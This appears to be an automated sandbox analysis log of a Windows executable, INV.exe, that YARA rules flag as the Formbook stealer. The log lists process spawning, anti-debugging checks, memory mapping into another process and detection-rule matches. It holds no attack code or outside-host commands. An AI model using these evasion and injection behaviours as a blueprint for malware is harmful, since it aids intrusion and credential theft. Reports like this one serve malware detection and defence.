          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal72.troj.evad.winEXE@9/4@0/0
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,4_2_00401489
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2856
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD26.tmpJump to behavior
          Source: INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\INV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe 'C:\Users\user\Desktop\INV.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknownProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exeJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exeJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exeJump to behavior
          Source: C:\Users\user\Desktop\INV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: INV.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.658590255.0000000002FCA000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV.exe, 00000000.00000003.647077119.0000000002C60000.00000004.00000001.sdmp, INV.exe, 00000003.00000003.653597565.00000000032E0000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.658584638.0000000002FC4000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 00000007.00000003.662436848.0000000004FDE000.00000004.00000040.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 00000007.00000003.662359081.0000000004EF2000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: wwin32u.pdb7^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb=^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.658722034.0000000002FCF000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp, WERD26.tmp.dmp.7.dr
          Source: Binary string: oleaut32.pdb]^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb;^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000007.00000003.658584638.0000000002FC4000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb)^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV.exe, 00000000.00000003.647077119.0000000002C60000.00000004.00000001.sdmp, INV.exe, 00000003.00000003.653597565.00000000032E0000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000007.00000003.662436848.0000000004FDE000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000007.00000003.662436848.0000000004FDE000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERD26.tmp.dmp.7.dr
          Source: Binary string: mscoree.pdbs^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb[^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.662414796.0000000004FD0000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000007.00000003.661742223.0000000005180000.00000004.00000001.sdmp, WERD26.tmp.dmp.7.dr
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.658722034.0000000002FCF000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.662352676.0000000004EE1000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdba^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.662424702.0000000004FD4000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdbk source: WerFault.exe, 00000007.00000003.662424702.0000000004FD4000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000007.00000003.658590255.0000000002FCA000.00000004.00000001.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdbo^ source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000007.00000003.662376905.0000000004FD1000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: Binary string: .pdbEE source: WerFault.exe, 00000007.00000003.662359081.0000000004EF2000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 00000007.00000003.662383535.0000000004FD7000.00000004.00000040.sdmp
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: INV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010821EE push ecx; ret 0_2_01082201
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A05B2 pushfd ; retf 0_2_010A05ED
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010AF402 push eax; ret 0_2_010AF408
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010AF46C push eax; ret 0_2_010AF472
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01062835 push ecx; ret 0_2_01062848
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8864 push edx; retf 0_2_010A8884
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01099B83 push es; ret 0_2_01099B93
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01099A9E push ss; ret 0_2_01099AEC
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0107EDC0 push eax; ret 0_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01096C15 push eax; iretd 0_2_01096C16
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8C60 push ds; retf 0_2_010A8C61
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8F2B push ecx; ret 0_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010A8F24 push ecx; ret 0_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0107EE70 push eax; ret 0_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01062835 push ecx; ret 2_2_01062848
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010821EE push ecx; ret 3_2_01082201
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A05B2 pushfd ; retf 3_2_010A05ED
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010AF402 push eax; ret 3_2_010AF408
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010AF46C push eax; ret 3_2_010AF472
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01062835 push ecx; ret 3_2_01062848
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8864 push edx; retf 3_2_010A8884
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01099B83 push es; ret 3_2_01099B93
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01099A9E push ss; ret 3_2_01099AEC
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0107EDC0 push eax; ret 3_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01096C15 push eax; iretd 3_2_01096C16
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8C60 push ds; retf 3_2_010A8C61
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8F2B push ecx; ret 3_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010A8F24 push ecx; ret 3_2_010A8F33
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0107EE70 push eax; ret 3_2_0107EE21
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401F16 push ecx; ret 4_2_00401F29
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01061BC7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_01061BC7
          Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0109BDC0 rdtsc 0_2_0109BDC0
          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00404A29 FindFirstFileExW,4_2_00404A29
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 00000007.00000002.724149212.0000000004BF2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0?
          Source: WerFault.exe, 00000007.00000002.724219863.0000000004C50000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.724244576.0000000004CE0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0109BDC0 rdtsc 0_2_0109BDC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010683A4 IsDebuggerPresent,0_2_010683A4
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010656BA EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_010656BA
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01077800 mov eax, dword ptr fs:[00000030h]0_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01077800 mov eax, dword ptr fs:[00000030h]0_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010802BD mov eax, dword ptr fs:[00000030h]0_2_010802BD
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010838C9 mov eax, dword ptr fs:[00000030h]0_2_010838C9
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01077A20 mov eax, dword ptr fs:[00000030h]0_2_01077A20
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01080D23 mov eax, dword ptr fs:[00000030h]0_2_01080D23
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01080C83 mov eax, dword ptr fs:[00000030h]0_2_01080C83
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01080CC0 mov eax, dword ptr fs:[00000030h]0_2_01080CC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01077800 mov eax, dword ptr fs:[00000030h]2_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01077800 mov eax, dword ptr fs:[00000030h]2_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01077A20 mov eax, dword ptr fs:[00000030h]2_2_01077A20
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01077800 mov eax, dword ptr fs:[00000030h]3_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01077800 mov eax, dword ptr fs:[00000030h]3_2_01077800
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010802BD mov eax, dword ptr fs:[00000030h]3_2_010802BD
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010838C9 mov eax, dword ptr fs:[00000030h]3_2_010838C9
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01077A20 mov eax, dword ptr fs:[00000030h]3_2_01077A20
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01080D23 mov eax, dword ptr fs:[00000030h]3_2_01080D23
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01080C83 mov eax, dword ptr fs:[00000030h]3_2_01080C83
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01080CC0 mov eax, dword ptr fs:[00000030h]3_2_01080CC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_004035F1 mov eax, dword ptr fs:[00000030h]4_2_004035F1
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01061DB2 GetProcessHeap,0_2_01061DB2
          Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010630B6 SetUnhandledExceptionFilter,0_2_010630B6
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010630E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_010630E7
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010630B6 SetUnhandledExceptionFilter,2_2_010630B6
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010630E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_010630E7
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010630B6 SetUnhandledExceptionFilter,3_2_010630B6
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010630E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_010630E7
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401E1D SetUnhandledExceptionFilter,4_2_00401E1D
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040446F
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00401C88
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401F30
          Source: C:\Users\user\Desktop\INV.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\INV.exeSection loaded: unknown target: C:\Users\user\Desktop\INV.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exeJump to behavior
          Source: C:\Users\user\Desktop\INV.exeProcess created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exeJump to behavior
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01082365 cpuid 0_2_01082365
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_0106E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_010660C8
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,0_2_0106E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_0106E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0106755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,0_2_0106458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0106E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0106E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,0_2_0106771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_0106E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_0106A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,0_2_010677A3
